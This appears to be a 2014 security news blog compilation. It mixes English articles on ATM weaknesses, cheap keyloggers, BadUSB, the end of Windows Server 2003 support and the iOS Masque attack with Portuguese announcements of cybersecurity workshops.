The results of the penetration testing session demonstrate the presence of several weaknesses in the banking systems, in many cases the ATMs were running on outdated operating systems like Windows XP.

“Banks have been taking things for granted because nothing like this has ever happened before.” the expert added.“They depended heavily on the CCTV and in some locations, they do not even have security guards.

The experts involved in the test also discovered many other serious flaws in the ATM, lack of encryption could expose sensitive data to tampering advantaging the hack of these machines with a malware based attack.

“It is also because of the lack of encryption technology such as the Public Key Infrastructure (PKI). “If the PKI was implemented, it wouldn’t have happened.” he added

Pierluigi Paganini

(Security Affairs – ATM hacking, RM100 computer chip)

Seminário sobre privacidade vai agitar São Paulo

http://www.emersonwendt.com.br/2014/10/evento-v-seminario-de-protecao.html?m=1

Workshop segurança cibernética é noticia

Segurança da informação será tema de workshop no Rio de Janeiro
Últimas Notícias - Notícias
TER, 11 DE NOVEMBRO DE 2014 10:30 ESCRITO POR AGÊNCIA GESTÃO CT&I

O avanço das ameaças no ciberespaço e as formas de se proteger no meio virtual serão termas do workshop “Segurança Cibernética para as novas Infraestruturas Inteligentes”, a ser realizado nesta quinta-feira (13) no pólo de laboratórios do Instituto Nacional de Metrologia, Qualidade e Tecnologia (Inmetro), no município de Duque de Caxias (RJ). A programação, que inclui painéis e sessões técnicas, tem como proposta incentivar um debate sobre a importância do desenvolvimento de ferramentas de segurança.
Promovido pelo Inmetro e seu equivalente nos Estados Unidos, o National Institute of Standarts and Technology (NIST), o encontro abordará assuntos como o controle e monitoramento via rede de serviços como água e energia elétrica, por exemplo. As duas entidades já desenvolveram pesquisas conjuntas em áreas estratégicas, como calibração e biocombustíveis, entre outras.

Para saber mais detalhes sobre as inscrições, além da programação completa, acesse o site do workshop neste link.

(Agência Gestão CT&I,

Cibercrime using keyloggers

Trend Micro issued a research paper on operations behind Predator Pain and Limitless keyloggers, both of which are easily obtainable from underground.

Cybercriminals ordinary use malicious code to steal money from victims, the number of malware available in the criminal ecosystem is continuously growing, their level of sophistication and cost are extremely variable. Thinking of banking malware, Zeus and SpyEye are probably the most popular, but represent the tip of the iceberg, in the underground it is possible to acquire low-priced malware that anyway can ensure to fraudsters substantial gains.
Security experts are aware that all these malicious code, if in the “right” hands, can bring in an astounding amount of money and create huge losses to the collectivity.
Security experts at TrendMicro have published an interesting paper on the operations behind Predator Pain and Limitless keyloggers, two low-priced ($40 or less), off-the-shelf keyloggers/RATs that are easy to acquire on the underground forums. The researchers have analyzed both Predator Pain and Limitless keyloggers for only a few months, discovering a surprising reality.
Predator Pain and Limitless screeshot
Predator Pain and Limitless screeshot 2
Let’s start from the economic perspective, the cost of these RATs is  $40 or less, but the malware implements similar capabilities with many other data stealer.
“Predator Pain and Limitless have the capability to steal a lot of information and exfiltrate them back to the cybercriminals. These are off-the-shelf tools and are easily obtainable for US$40 or less in underground forums orwebsites run by their creators.”  “Attackers, after obtaining access to infected computers and the credentials stored in them, sit on a gold mine of information that they can use for various criminal and fraudulent activities,” the researchers explain in a whitepaper.
Data provided by the Commercial Crime Bureau of Hong Kong Police Force reveals that cybercriminals using the above malware against small and medium-sized businesses in Hong Kong have earned more than $75 million in the first half 2014. These data are alarming, if we compare these losses to the economic impact of the Zeus Botnet as explained in the paper:
“Consider: this means that cybercriminals in a single city, within six-months, equaled all the losses from Zbot up to the present,” Trend Micro senior threat researcher Ryan Flores pointed out. “Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved,” he explained.
Predator Pain and Limitless graph
“In fact, in Hong Kong alone, the estimated loss resulting from corporate email fraud has increased 491% from 2012 to 2013 and 180% from 2013 to 2014. As of June 2014, the total reported loss amounted to HK$565.5 million (approximately US$73 million).”
Predator Pain and Limitless Comparison
The use of off-the-shelf keyloggers/RATs like Predator Pain and Limitless doesn’t impact the illicit activities of criminal crews, in many cases, crooks prefer to invest more time and effort instead of using automated malware that results anyway more expensive.

“The tools these fraudsters use are not advanced. Combined, clever targeting, patience, cunning and simple keyloggers have netted these cybercriminals large sums of money,” Flores said. “These highlight that cybercrime activities are dependent not only on the sophistication of the tools used, but on how well organized the entire scheme is. A sophisticated, well-designed scam can net its operators significant sums of money, as seen here.”

The monitoring on several Predator Pain and Limitless attacks allowed the experts to track the used of these tools, in particular the findings revealed that a significant portion of operators was involved in utilizing the following:

The 419 or Nigerian scams through easy-to-deploy, high-volume attacks
Scammed corporate emails that convince recipients to deposit payment to specially crafted accounts
419 scammers are considered within more lucrative activities on a large scale that benefit of the malware to hit exclusively SMBs. SMBs are more exposed to external attacks due to the lack of an efficient security posture and dedicated IT security staff.

“SMBs may not be involved in multimillion-dollar deals, but they do conduct transactions worth tens to hundreds of thousands of dollars,” the researchers noted. “As the world relies more and more on Web services (e.g., webmail), all it will take to ruin a business is a single compromised online account.”

The common attack scenario based on these malicious code sstart sending out classic phishing emails to publicly listed email addresses. The attackers attach the keylogger to the email, once the victims install it the malware silently steal user data, including system screenshots, keystrokes, browser-cached account credentials, and sends information back to the command and control servers via email, FTP, or Web panel (PHP).

“Attackers, after obtaining access to infected computers and the credentials stored in them, sit on a gold mine of information that they can use for various criminal and fraudulent activities. Successfully stealing online banking credentials can lead to financial theft. Some of the stolen information provide attackers more leverage for subsequent attacks. They can, for instance, get their hands on actual emails and use these to “hijack” ongoing transactions between their chosen victims and their clients” states the paper referring the postinfection activities.

The report highlights that stolen data could be used later for further attacks against victims and could be sold in the underground to other criminal organization, personal data and sensitive information are a precious commodity in the underground.

The most scaring aspect of the analysis made by researchers on the use of Predator Pain and Limitless is that criminal gangs are targeting SMBs (small and medium-sized businesses) considered vulnerable targets by the gangs that aim to realize rapid gains exploiting the lack of awareness of general IT security best practices.

The “Predator Pain and Limitless When Cybercrime Turns into Cyberspying” is another excellent analysis conducted by the researchers at TrendMicro, don’t miss this report.

Pierluigi Paganini

(Security Affairs –  Predator Pain and Limitless keyloggers, keyloggers/RAT)

Share it please ...Tweet about this on TwitterShare on Google+Share on FacebookShare on LinkedInPin on PinterestShare on RedditEmail this to someoneShare on StumbleUpon
Share this:
EmailTwitter15PrintLinkedIn21Facebook11More
November 13, 2014
« Previous
View Full Site
Proudly powered by WordPress

INMETRO e NIST promovem workshop sobre segurança cibernética.

A preocupação com a internet das coisas é o principal foco do workshop conjunto entre o INMETRO  e o NIST .
Com o crescente avanço de dispositivos conectados à Internet é fundamental estudar os impactos na segurança da informação , das pessoas e negócios.

Pen drive , are you safety?

The researcher Karsten Nohl and his team presented an update of their BadUSB study.It is impossible to discriminate patchable devices from inpatchable ones.

Earlier August 2014 the security expert Karsten Nohl and his team discovered that an attacker could exploit a new class of attacks based on a USB device to compromise a targeted machine. The attack could be used to compromise personal computers and is able to evade all actual security protections loading malicious software in low-cost computer chips that control the functions of USB devices.

“Nohl and Lell’s BadUSB demonstrations during Black Hat illustrated how their code could overwrite USB firmware and turn a USB device into anything. A flash drive plugged into a PC, could for example, emulate a keyboard and issue commands that steal data from the machine, spoof a computer’s network interface and redirect traffic by altering DNS settings, or could load malware from a hidden partition on the drive.”

The researchers point a series of flaws in the software used to run a tiny electronic components, these components are usually designed without protections against tampering with their code. Hackers can uncover such flaws and exploit them creating serious problems to the targeted architecture.

badusb vulnerability

“You cannot tell where the virus came from. It is almost like a magic trick,” said Nohl.

As reported in a blog post published by Wired unpatchable security flaw in USB devices affects only the fifty percent of USB devices, but it is nearly impossible to discriminate secure USB units from the insecure ones “without ripping open every last thumb drive”.

Last week Nohl, and his fellow researchers Jakob Lell and Sascha Krissler, presented an update to his BadUSB research at the PacSec security conference in Tokyo. The experts analyzed the USB controller chips sold by the eight biggest vendors (Phison, Alcor, Renesas, ASmedia, Genesys Logic, FTDI, Cypress and Microchip) discovering that half of them were vulnerable to the attack, but the expert revealed that it was impossible to predict which chip a device uses is impossible for the final user.

“It’s not like you plug [a thumbdrive] into your computer and it tells you this is a Cypress chip, and this one is a Phison chip,” says Nohl, naming two of the top USB chip manufacturers. “You really can’t check other than by opening the device and doing the analysis yourself…The scarier story is that we can’t give you a list of safe devices.”

The experts analyzed versions of each chip both by looking up its published specs and by plugging a device using it into a USB port and attempting to overwrite the firmware in the chip.

“They found an unpredictable patchwork of results. All of the USB storage controllers from Taiwanese firm Phison that Nohl tested, for instance, were vulnerable to reprogramming. Chips from ASmedia weren’t, Nohl’s tests found. Controller chips from fellow Taiwanese company Genesys that used the USB 2 standard were immune, but ones that used the newer USB 3 standard were susceptible. In other categories of device like USB hubs, keyboards, webcams and mice, the results produced an even messier Excel spreadsheet of “vulnerable,” “secure,” and “inconclusive.”” reports Wired.

Unfortunately, device makers don’t provide info on the manufacture of the chips they have integrated, in some cases, they use chips from different vendors, even in the same product, this politic allows them to choose the cheapest suppliers for different lots of production.

The only way to prevent the exploitation of the BadUSB is to request device makers to label the chips they use in their products.

“You’d never get away with this in a laptop. People would go crazy if they bought a computer and it wasn’t the chip they saw in the review they read,” explains Nohl. “It’s just these USB devices that come as black boxes.”

It’s clear that what Nohl suggest is quite impossible to realize, so the researcher decided not to release the proof-of-concept code for his BadUSB attack when he demonstrated it at Black Hat.

The company Imation already implemented a solution to protect its users against the BadUSB attacks, its solution Ironkey requires that any new updates to its chip firmware be digitally signed with an unforgeable cryptographic signature. The process was designed to prevent malicious reprogramming of the USB firmware. According to Nohl, other USB makers could adopt the same strategy to secure their users.

Nohl highlighted that the total lack of transparency in the USB device industry exposes everyone use a USB device to the risk of attack, every device is potentially exploitable by bad actors.

“Some people have accepted that USB is insecure. Others remember BadUSB only as the Phison bug. That second group needs to wake up to the same level of awareness of the first group,” Nohl says. “For practical purposes, it affects potentially everything.”

Pierluigi Paganini

How conected world affect privacity?

Featured news
The biggest challenges around connected devices
Infosec industry: Time to put up or shut up
Organized cyber crooks plunder SMBs with simple, cheap keyloggers
Latest Microsoft patches crucial for all Windows users
Report: Targeted digital threats against civil society organizations
Do senior executives value information security?
Whitepaper: Still using proxies for URL filtering? There’s a better way
SAP finally patches critical, remotely exploitable bugs in GRC solution
Many IT pros store compromising material on their mobile phones
73% of organizations say BYOD increases security risks
First victims of the Stuxnet worm revealed
Vigilance and the Enterprise of Things
8 criteria to decide which ISO 27001 policies and procedures to write
Application Threat and Usage Report 2014
A holistic approach to protecting intellectual property
Fake malware-laden Amazon emails target UK, US shoppers

The biggest challenges around connected devices
Posted on 13 November 2014.
Few European IT departments or workplaces are ready for the invasion of wearable technology and other connected devices.

According to a 110-country survey of ISACA members who are business and IT professionals, 43% of respondents in Europe, the Middle East and Africa (EMEA) say their organization has plans in place to leverage the Internet of Things or expects to create plans in the next 12 months.

However, the majority is not ready for wearable technology in the workplace. More than half (57%) say their BYOD policy does not address wearables and a further 24% do not even have a BYOD policy in place. This is a concern, as approximately 8 in 10 respondents (81%) say BYOW (bring your own wearables) is as risky as—or riskier than—BYOD.

Overall, half of ISACA members across EMEA believe the benefit of the Internet of Things outweighs the risk for individuals (50%), while nearly a third believe the risk outweighs the benefit for enterprises (31%). Yet despite the risks, nearly a third (30%) says the Internet of Things has given their business greater access to information and a quarter (25%) say it has improved services in their organization.

Approximately four in 10 hope to benefit from improved services (40%), increased customer satisfaction (39%), and greater efficiency (38%) as a result of connected devices.

Despite the benefits of connected devices, more than half (51%) of respondents believe the biggest challenge regarding the Internet of Things is increased security threats, while a quarter (26%) are concerned about data privacy issues. Two-thirds (68%) admit they are very concerned about the decreasing level of personal privacy.

More than a quarter of respondents say the general public’s biggest concerns about connected devices should be that they don’t know how the information collected on the devices will be used (28%) or they don’t know who has access to the information collected (26%).

‘The Internet of Things is here to stay, and following the holidays, we are likely to see a surge in wearable devices in the workplace,” said Ramsés Gallego, international vice president of ISACA. “These devices can deliver great value, but they can also bring great risk. ISACA’s research found that more than a third (35%) of EMEA ISACA members believe Big Data has the potential to add significant value, yet one-fifth (21%) admit their organization lacks the analytics capabilities or skills to deal with it.”

End of life 2003 server

NCCIC / US-CERT
National Cyber Awareness System:

TA14-310A: Microsoft Ending Support for Windows Server 2003 Operating System
11/10/2014 07:19 AM EST

Original release date: November 10, 2014
Systems Affected

Microsoft Windows Server 2003 operating system

Overview

Microsoft is ending support for the Windows Server 2003 operating system on July 14, 2015.[1] After this date, this product will no longer receive:

Security patches that help protect PCs from harmful viruses, spyware, and other malicious software
Assisted technical support from Microsoft
Software and content updates
Description

All software products have a lifecycle. End of support refers to the date when Microsoft will no longer provide automatic fixes, updates, or online technical assistance.[2] As of July 2014, there were 12 million physical servers worldwide still running Windows Server 2003.[3]

Impact

Computer systems running unsupported software are exposed to an elevated risk to cybersecurity dangers, such as malicious attacks or electronic data loss.

Users may also encounter problems with software and hardware compatibility since new software applications and hardware devices may not be built for Windows Server 2003.

Organizations that are governed by regulatory obligations may find they are no longer able to satisfy compliance requirements while running Windows Server 2003.

Solution

Computers running the Windows Server 2003 operating system will continue to work after support ends. However, using unsupported software may increase the risks of viruses and other security threats. Negative consequences could include loss of confidentiality, integrity, and or availability of data, system resources and business assets.

The Microsoft "Microsoft Support Lifecycle Policy FAQ" page offers additional details.[2]

Users have the option to upgrade to a currently supported operating system or other cloud-based services. There are software vendors and service providers in the marketplace who offer assistance in migrating from Windows Server 2003 to a currently supported operating system or SaaS (software as a service) / IaaS (infrastructure as a service) products and services.[4,5] US-CERT does not endorse or support any particular product or vendor.

References

[1] Microsoft Product Lifecycle Listing
[2] Microsoft Support Lifecycle Policy FAQ
[3] Redmond Magazine, Prepare for Windows Server 2003's End of Support
[4] Windows Server 2003 Migration Support
[5] TechTarget, Weighing next steps following Windows Server 2003 end-of-life
Revision History

November 10, 2014: Initial Release

More one IOS attack

Researchers at FireEye identified a new attack dubbed the Masque, which allows attackers to replace a genuine app with a malicious one.

In these days Apple the community has discovered that is vulnerable to WireLurker, a new strain of malware that is able to infect Apple iPhone and iPad syphoning user’data.

The malware was discovered for the first time by experts at Palo Alto Networks that revealed it exhibited behavior that had never been seen before malware targeting Apple mobile devices, unfortunately, it has yet to be patched.

Meanwhile the security experts analyze the WireLurker case, the disclosure of a new attack in the wild exploiting a vulnerability dubbed the Masque is attracting the interest of the experts. Practically the exploitation of the Masque flaw allows bad actors to replace enterprise-signed apps, overwriting them with trojanized apps.

The Masque  vulnerability allows an attacker to swap out a legitimate iOS app with a malicious one, the attack scheme is effective against jailbroken and non-jailbroken devices.

Masque affects iOS 7.1.1, 7.1.2, 8.0, 8.1, and 8.1.1 beta, its attack schema is quite different from WireLurker that infects Apple mobile devices once connected via USB, but it can also be run remotely via an SMS or email message pointing a victim toward a malicious app.

Also in this case the problem seems to be caused by a poor implementation of an authentication process, the expert Tao Wei, a senior staff research scientist at FireEye, explained that Apple’s enterprise provisioning feature does not analyze digital certificates for apps given identical bundle identifiers.

The Enterprise provisioning service implemented by Apple allows enterprise iOS developers to develop and distribute iOS apps without having to upload the app to Apple.

“FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier.”

“This vulnerability exists because iOS doesn’t enforce matching certificates for apps with the same bundle identifier,” Tao Wei said on the company’s blog post. “An attacker can leverage this vulnerability both through wireless networks and USB.” “iOS doesn’t check certificates during updating,” “Attackers can replace the old app with a fake app.” “Currently there is not MDM API to get the certificate information for each app,” Wei said. “Thus, it is difficult for the MDM to detect such attacks.”

Wei speaking about the WireLurker, explained that it is the unique case of attack up until now observed that is exploiting the Masque vulnerability. Let’s remind that the WireLurker malware in a first stage infects a host (desktop or laptop), which downloaded the malicious software from the web, then it waits for an Apple device (i.e. iPhone or iPad) to be connected via USB.

Once the Apple device is connected to the infected PC, WireLurker scans it analyzing the installed applications, then if a target app is present, it copies the app from the mobile device to the host, infects it and then install it again on the mobile unit.

The blog post published by FireEye also includes a demonstration of an attack, the experts have exploited the Masque replacing a valid Gmail app downloaded from the Apple App Store with a malicious version of the same app that is able to syphon the user’ messages. The attack starts with an SMS sent to the victims that invite it to download a new version of a legitimate app New Flappy Bird.

“In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone.” states the post. “By using the Masque attack, attackers can get all your existing sensitive data on your iPhone,” Wei added.

Masque demonstation

The attack is very dangerous, a bad actor would be able to mimic the original app to steal a user’s credentials, the risk is serious if we thin the possibility to compromise also signed banking apps. Experts at FireEye also explained that user’s data stored in the legitimate app’s directory, including local data caches, could be accessed by the malware.

“Masque Attacks can replace authentic apps,such as banking and email apps, using attacker’s malware through the Internet. That means the attacker can steal user’s banking credentials by replacing an authentic banking app with an malware that has identical UI. Surprisingly, the malware can even access the original app’s local data, which wasn’t removed when the original app was replaced. These data may contain cached emails, or even login-tokens which the malware can use to log into the user’s account directly.”

The principal problem for the security community is related to the simplicity in the exploitation of the Masque vulnerability.

“It is a very powerful [vulnerability], but at the same time, it is very easy to exploit,” Wei said. “It can make the enterprise provisioning attack more powerful and more coverage over the victim. It’s easy to exploit and that’s why we are so concerned and why we think users should be warned.”

In order to avoid falling victim of a Masque Attack, it is suggested to adopt simply practices:
Do not download mobile apps clicking on a link received via email, text messages, or present on a web page.
Don’t install apps offered on pop-ups from third-party websites.
If the mobile device displays an alert about an “Untrusted App Developer,” click “Don’t Trust” on the alert and uninstall the application.
Pierluigi Paganini